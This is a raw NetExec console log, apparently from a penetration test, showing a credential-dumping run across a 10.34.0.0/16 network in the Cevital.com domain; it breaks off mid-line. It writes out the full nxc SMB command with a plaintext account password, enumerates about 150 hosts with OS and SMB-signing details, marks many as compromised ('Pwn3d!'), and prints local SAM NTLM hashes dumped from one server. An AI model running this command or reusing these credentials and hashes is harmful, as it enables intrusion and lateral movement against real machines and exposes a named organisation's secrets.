Sam Hashes

Uploaded by

razielleibra

nxc smb 10.34.0.0/16 -u 'oxxo_pentest' -p 'p8Z49-#MX6?ki@' --sam
SMB 10.34.160.43 445 OXOLT0200001 [*] Windows 11 Build 22621 x64
(name:OXOLT0200001) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.16 445 OXODT020118 [*] Windows 11 Build 22621 x64
(name:OXODT020118) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.35 445 OXOLT020056 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020056) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.11 445 OXODT020102 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT020102) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.30 445 OXODT020153 [*] Windows 11 Build 22621 x64
(name:OXODT020153) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.82 445 OXODT020060 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT020060) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.27 445 OXOLT020021 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020021) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.13 445 OXODT020092 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT020092) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.37 445 OXODT020008 [*] Windows 11 Build 22621 x64
(name:OXODT020008) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.130 445 OXODT020013 [*] Windows 11 Build 22621 x64
(name:OXODT020013) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.17 445 OXODT020041 [*] Windows 11 Build 22621 x64
(name:OXODT020041) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.40 445 OXODT020121 [*] Windows 11 Build 22621 x64
(name:OXODT020121) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.126 445 OXOLT020044 [*] Windows 11 Build 22621 x64
(name:OXOLT020044) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.41 445 OXODT020082 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT020082) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.64 445 OXODT02070006 [*] Windows 11 Build 22621 x64
(name:OXODT02070006) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.32 445 OXODT020131 [*] Windows 11 Build 22621 x64
(name:OXODT020131) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.22 445 OXODT020009 [*] Windows 11 Build 22621 x64
(name:OXODT020009) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.120 445 OXODT020116 [*] Windows 11 Build 22621 x64
(name:OXODT020116) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.116 445 OXODT020068 [*] Windows 11 Build 22621 x64
(name:OXODT020068) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.74 445 OXODT020158 [*] Windows 11 Build 22621 x64
(name:OXODT020158) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.222 445 NONE [*] OS 1.00 (name:) (domain:)
(signing:False) (SMBv1:True)
SMB 10.34.160.24 445 OXODT020088 [*] Windows 11 Build 22621 x64
(name:OXODT020088) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.135 445 OXOLT020057 [*] Windows 11 Build 22621 x64
(name:OXOLT020057) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.59 445 OXODT020127 [*] Windows 11 Build 22621 x64
(name:OXODT020127) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.106 445 OXODT02070004 [*] Windows 11 Build 22621 x64
(name:OXODT02070004) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.25 445 OXODT02090005 [*] Windows 11 Build 22621 x64
(name:OXODT02090005) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.207 445 NONE [*] OS 1.00 (name:) (domain:)
(signing:False) (SMBv1:True)
SMB 10.34.160.39 445 OXODT020079 [*] Windows 11 Build 22621 x64
(name:OXODT020079) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.110 445 OXODT020011 [*] Windows 11 Build 22621 x64
(name:OXODT020011) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.45 445 OXODT020047 [*] Windows 11 Build 22621 x64
(name:OXODT020047) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.136 445 OXODT020004 [*] Windows 11 Build 22621 x64
(name:OXODT020004) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.23 445 CEVLAP2116 [*] Windows 11 Build 22621 x64
(name:CEVLAP2116) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.146 445 OXOLT020059 [*] Windows 11 Build 22621 x64
(name:OXOLT020059) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.80 445 OXODT020030 [*] Windows 11 Build 22621 x64
(name:OXODT020030) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.113 445 OXODT020031 [*] Windows 11 Build 22621 x64
(name:OXODT020031) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.127 445 OXODT020142 [*] Windows 10.0 Build 26100
x64 (name:OXODT020142) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.1 445 OXODT02030007 [*] Windows 11 Build 22621 x64
(name:OXODT02030007) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.61 445 OXOLT020024 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020024) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.70 445 OXODT020010 [*] Windows 11 Build 22621 x64
(name:OXODT020010) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.122 445 OXODT02090006 [*] Windows 11 Build 22621 x64
(name:OXODT02090006) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.132 445 OXODT020065 [*] Windows 11 Build 22621 x64
(name:OXODT020065) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.54 445 OXODT020087 [*] Windows 11 Build 22621 x64
(name:OXODT020087) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.97 445 OXODT020097 [*] Windows 11 Build 22621 x64
(name:OXODT020097) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.9 445 OXODT02100006 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02100006) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.161.2 445 OXODT02030003 [*] Windows 11 Build 22621 x64
(name:OXODT02030003) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.154 445 OXOLT020010 [*] Windows 11 Build 22621 x64
(name:OXOLT020010) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.8 445 OXODT02050012 [*] Windows 11 Build 22621 x64
(name:OXODT02050012) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.13 445 OXODT020022 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT020022) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.92 445 OXODT020225 [*] Windows 11 Build 22621 x64
(name:OXODT020225) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.18 445 OXODT020113 [*] Windows 11 Build 22621 x64
(name:OXODT020113) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.49 445 NONE [*] OS 1.00 (name:) (domain:)
(signing:False) (SMBv1:True)
SMB 10.34.160.139 445 OXODT020151 [*] Windows 10.0 Build 26100
x64 (name:OXODT020151) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.11 445 OXODT02030005 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02030005) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.161.3 445 OXODT02060001 [*] Windows 11 Build 22621 x64
(name:OXODT02060001) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.4 445 OXODT02060004 [*] Windows 11 Build 22621 x64
(name:OXODT02060004) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.142 445 OXODT020077 [*] Windows 11 Build 22621 x64
(name:OXODT020077) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.133 445 OXOLT020048 [*] Windows 11 Build 22621 x64
(name:OXOLT020048) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.33 445 OXODT020019 [*] Windows 11 Build 22621 x64
(name:OXODT020019) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.12 445 OXODT02030010 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02030010) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.123 445 OXODT020227 [*] Windows 11 Build 22621 x64
(name:OXODT020227) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.63 445 OXODT020037 [*] Windows 11 Build 22621 x64
(name:OXODT020037) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.100 445 OXOLT020007 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020007) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.76 445 OXODT020146 [*] Windows 11 Build 22621 x64
(name:OXODT020146) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.53 445 OXOLT020058 [*] Windows 11 Build 22621 x64
(name:OXOLT020058) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.94 445 OXOLT020023 [*] Windows 11 Build 22621 x64
(name:OXOLT020023) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.108 445 OXODT020108 [*] Windows 11 Build 22621 x64
(name:OXODT020108) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.36 445 OXOLT020043 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020043) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.134 445 OXODT020115 [*] Windows 11 Build 22621 x64
(name:OXODT020115) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.114 445 OXODT020135 [*] Windows 11 Build 22621 x64
(name:OXODT020135) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.98 445 OXODT020021 [*] Windows 11 Build 22621 x64
(name:OXODT020021) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.96 445 OXOLT020017 [*] Windows 11 Build 22621 x64
(name:OXOLT020017) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.14 445 OXODT020156 [*] Windows 11 Build 22621 x64
(name:OXODT020156) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.5 445 OXODT02060010 [*] Windows 11 Build 22621 x64
(name:OXODT02060010) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.149 445 OXODT020149 [*] Windows 11 Build 22621 x64
(name:OXODT020149) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.31 445 OXODT020091 [*] Windows 11 Build 22621 x64
(name:OXODT020091) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.143 445 OXOLT020041 [*] Windows 11 Build 22621 x64
(name:OXOLT020041) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.128 445 OXODT020063 [*] Windows 11 Build 22621 x64
(name:OXODT020063) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.6 445 OXODT02040010 [*] Windows 11 Build 22621 x64
(name:OXODT02040010) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.48 445 OXODT020104 [*] Windows 11 Build 22621 x64
(name:OXODT020104) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.67 445 OXODT020141 [*] Windows 11 Build 22621 x64
(name:OXODT020141) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.125 445 OXODT020007 [*] Windows 11 Build 22621 x64
(name:OXODT020007) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.19 445 OXODT020042 [*] Windows 11 Build 22621 x64
(name:OXODT020042) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.112 445 OXODT020226 [*] Windows 11 Build 22621 x64
(name:OXODT020226) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.42 445 OXODT020006 [*] Windows 11 Build 22621 x64
(name:OXODT020006) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.150 445 OXODT020101 [*] Windows 11 Build 22621 x64
(name:OXODT020101) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.84 445 OXOLT020030 [*] Windows 10.0 Build 26100
x64 (name:OXOLT020030) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.111 445 OXODT020099 [*] Windows 11 Build 22621 x64
(name:OXODT020099) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.144 445 OXOLT020004 [*] Windows 11 Build 22621 x64
(name:OXOLT020004) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.102 445 OXOLT020019 [*] Windows 11 Build 22621 x64
(name:OXOLT020019) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.12 445 OXODT020086 [*] Windows 11 Build 22621 x64
(name:OXODT020086) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.66 445 OXODT020020 [*] Windows 11 Build 22621 x64
(name:OXODT020020) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.115 445 OXODT020114 [*] Windows 11 Build 22621 x64
(name:OXODT020114) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.26 445 OXODT020070 [*] Windows 11 Build 22621 x64
(name:OXODT020070) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.77 445 OXOLT020027 [*] Windows 11 Build 22621 x64
(name:OXOLT020027) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.141 445 OXODT020105 [*] Windows 11 Build 22621 x64
(name:OXODT020105) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.10 445 OXODT02010001 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02010001) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.58 445 OXOLT020033 [*] Windows 11 Build 22621 x64
(name:OXOLT020033) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.213 445 NONE [*] OS 1.00 (name:) (domain:)
(signing:False) (SMBv1:True)
SMB 10.34.161.15 445 OXODT02060051 [*] Windows 11 Build 22621 x64
(name:OXODT02060051) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.17 445 OXODT02040004 [*] Windows 11 Build 22621 x64
(name:OXODT02040004) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.24 445 OXODT02070011 [*] Windows 11 Build 22621 x64
(name:OXODT02070011) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.20 445 OXODT02060005 [*] Windows 11 Build 22621 x64
(name:OXODT02060005) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.18 445 OXODT02030008 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02030008) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.161.14 445 OXODT02070005 [*] Windows 10.0 Build 26100
x64 (name:OXODT02070005) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.19 445 OXODT02070021 [*] Windows 11 Build 22621 x64
(name:OXODT02070021) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.22 445 OXODT02020002 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02020002) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.56 445 OXOASP02007 [*] Windows 11 Build 22621 x64
(name:OXOASP02007) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.161.29 445 OXODT02020001 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02020001) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.161.37 445 OXODT02020004 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02020004) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.160.43 445 OXOLT0200001 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.161.31 445 OXODT02030013 [*] Windows 11 Build 22621 x64
(name:OXODT02030013) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.28 445 OXODT02040007 [*] Windows 11 Build 22621 x64
(name:OXODT02040007) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.40 445 OXODT02040006 [*] Windows 11 Build 22621 x64
(name:OXODT02040006) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.161.30 445 OXODT02020005 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXODT02020005) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.161.31 445 OXODT02030013 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.35 445 OXOLT020056 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.11 445 OXODT020102 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.30 445 OXODT020153 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.82 445 OXODT020060 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:17] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
Traceback (most recent call last)

/usr/lib/python3/dist-packages/nxc/protocols/smb.py:1496 in sam

  1493             add_sam_hash.sam_hashes = 0
  1494
  1495             if self.remote_ops and self.bootkey:
❱ 1496                 SAM_file_name = self.remote_ops.saveSAM()
  1497                 SAM = SAMHashes(
  1498                     SAM_file_name,
  1499                     self.bootkey,

/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:934 in saveSAM

   931
   932     def saveSAM(self):
   933         LOG.debug('Saving remote SAM database')
❱  934         return self.__retrieveHive('SAM')
   935
   936     def saveSECURITY(self):
   937         LOG.debug('Saving remote SECURITY database')

/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py:925 in __retrieveHive

   922         except:
   923             raise Exception("Can't open %s hive" % hiveName)
   924         keyHandle = ans['phkResult']
❱  925         rrp.hBaseRegSaveKey(self.__rrp, keyHandle, '..\\Temp\\'+tmpFileName)
   926         rrp.hBaseRegCloseKey(self.__rrp, keyHandle)
   927         rrp.hBaseRegCloseKey(self.__rrp, regHandle)
   928         # Now let's open the remote file, so it can be read later

/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rrp.py:946 in hBaseRegSaveKey

   943     request['hKey'] = hKey
   944     request['lpFile'] = checkNullString(lpFile)
   945     request['pSecurityAttributes'] = pSecurityAttributes
❱  946     return dce.request(request)
   947
   948 def hBaseRegSetValue(dce, hKey, lpValueName, dwType, lpData):
   949     request = BaseRegSetValue()

/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py:882 in request

   879                     exception = sessionErrorClass(error_code = error_code)
   880                 else:
   881                     exception = sessionErrorClass(packet = response, error_code = error_code)
❱  882             raise exception
   883         else:
   884             response = respClass(answer, isNDR64 = isNDR64)
   885             return response

DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

SMB 10.34.160.27 445 OXOLT020021 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:18] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

SMB 10.34.160.13 445 OXODT020092 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:19] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

SMB 10.34.160.37 445 OXODT020008 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:20] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

SMB 10.34.160.130 445 OXODT020013 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.17 445 OXODT020041 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:21] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518
DCERPCException: DCERPC Runtime Error: code: 0x5 -


rpc_s_access_denied

SMB 10.34.160.40 445 OXODT020121 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.126 445 OXOLT020044 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.41 445 OXODT020082 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:22] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.160.64 445 OXODT02070006 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:23] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.162.129 445 OXOASP02004 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02004) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.160.109 445 AKS160001 [*] Windows 5.1 x32
(name:AKS160001) (domain:AKS160001) (signing:False) (SMBv1:True)
SMB 10.34.162.132 445 OXXVSRV2000 [*] Windows Server 2022 Build
20348 x64 (name:OXXVSRV2000) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.131 445 OXXSDC0202 [*] Windows Server 2022 Build
20348 x64 (name:OXXSDC0202) (domain:Cevital.com) (signing:True) (SMBv1:False)
SMB 10.34.160.89 445 INTERHM [*] Windows 8.1 Pro 9600 x64
(name:INTERHM) (domain:interhm) (signing:False) (SMBv1:True)
SMB 10.34.162.139 445 OXOASP02002 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02002) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.135 445 OXOASP02011 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02011) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.142 445 OXOAST02003 [*] Windows 10 / Server 2019
Build 17763 x64 (name:OXOAST02003) (domain:Cevital.com) (signing:False)
(SMBv1:False)
SMB 10.34.162.140 445 OXOASP02018 [*] Windows 10 / Server 2019
Build 17763 x64 (name:OXOASP02018) (domain:Cevital.com) (signing:False)
(SMBv1:False)
SMB 10.34.160.152 445 LA26300001 [*] Windows 5.1 x32
(name:LA26300001) (domain:La26300001) (signing:False) (SMBv1:True)
SMB 10.34.162.156 445 OXOASP02016 [*] Windows Server 2019
Standard 17763 x64 (name:OXOASP02016) (domain:Cevital.com) (signing:False)
(SMBv1:True)
ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.162.141 445 OXOBIP02001 [*] Windows Server 2022 Build
20348 x64 (name:OXOBIP02001) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.158 445 OXODBP02002 [*] Windows 10 / Server 2019
Build 17763 x64 (name:OXODBP02002) (domain:Cevital.com) (signing:False)
(SMBv1:False)
SMB 10.34.162.149 445 OXOASP02017 [*] Windows Server 2019
Standard 17763 x64 (name:OXOASP02017) (domain:Cevital.com) (signing:False)
(SMBv1:True)
SMB 10.34.162.143 445 OXOSCCM02001 [*] Windows Server 2022 Build
20348 x64 (name:OXOSCCM02001) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.160 445 OXOPMP02001 [*] Windows Server 2022 Build
20348 x64 (name:OXOPMP02001) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.161 445 OXOPMP02002 [*] Windows Server 2022 Build
20348 x64 (name:OXOPMP02002) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.160.60 445 6120C-112 [*] Windows 7 Professional 7601
Service Pack 1 x32 (name:6120C-112) (domain:6120C-112) (signing:False) (SMBv1:True)
SMB 10.34.162.153 445 OXOASD02001 [*] Windows Server 2022 Build
20348 x64 (name:OXOASD02001) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.166 445 OXOASP02005 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02005) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.152 445 OXOBSP02001 [*] Windows 10 / Server 2019
Build 17763 x64 (name:OXOBSP02001) (domain:Cevital.com) (signing:False)
(SMBv1:False)
SMB 10.34.162.146 445 OXOASP02009 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02009) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.159 445 OXOASP02010 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02010) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.192 445 OXOASP02024 [*] Windows 10 / Server 2019
Build 19041 x64 (name:OXOASP02024) (domain:Cevital.com) (signing:True)
(SMBv1:False)
SMB 10.34.162.170 445 OXOASP02015 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02015) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.160.32 445 OXODT020131 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.164 445 OXOASP02022 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02022) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.171 445 OXOASP02019 [*] Windows Server 2022 Build
20348 x64 (name:OXOASP02019) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.188 445 OXOBSP02002 [*] Windows 10 / Server 2019
Build 17763 x64 (name:OXOBSP02002) (domain:Cevital.com) (signing:False)
(SMBv1:False)
SMB 10.34.162.133 445 OXXVSRV2001 [*] Windows Server 2022 Build
20348 x64 (name:OXXVSRV2001) (domain:Cevital.com) (signing:False) (SMBv1:False)
SMB 10.34.162.134 445 OXXVSRV2002 [*] Windows 10 / Server 2019
Build 17763 x64 (name:OXXVSRV2002) (domain:Cevital.com) (signing:False)
(SMBv1:False)
[03:24:24] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.162.164 445 OXOASP02022 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
[03:24:26] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.162.164 445 OXOASP02022 [*] Dumping SAM hashes
SMB 10.34.160.120 445 OXODT020116 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.160.116 445 OXODT020068 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.164 445 OXOASP02022
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:b5291c23de6cb8c96c21c55be36f543
a:::
SMB 10.34.162.164 445 OXOASP02022
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.34.160.74 445 OXODT020158 [+] Cevital.com\
oxxo_pentest:p8Z49-#MX6?ki@ (Pwn3d!)
SMB 10.34.162.164 445 OXOASP02022
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c
0:::
SMB 10.34.160.222 445 NONE [+] \oxxo_pentest:p8Z49-#MX6?
ki@ (Guest)
[03:24:28] ERROR DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
smb.py:1518

SMB 10.34.162.164 445 OXOASP02022
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:22cd04317fba5bde4063c97be8f
44fd7:::
SMB 10.34.162.164 445 OXOASP02022 [+] Added 4 SAM hashes to the
database
SMB 10.34.160.24 445 OXODT020088 [+] Cevital.com\
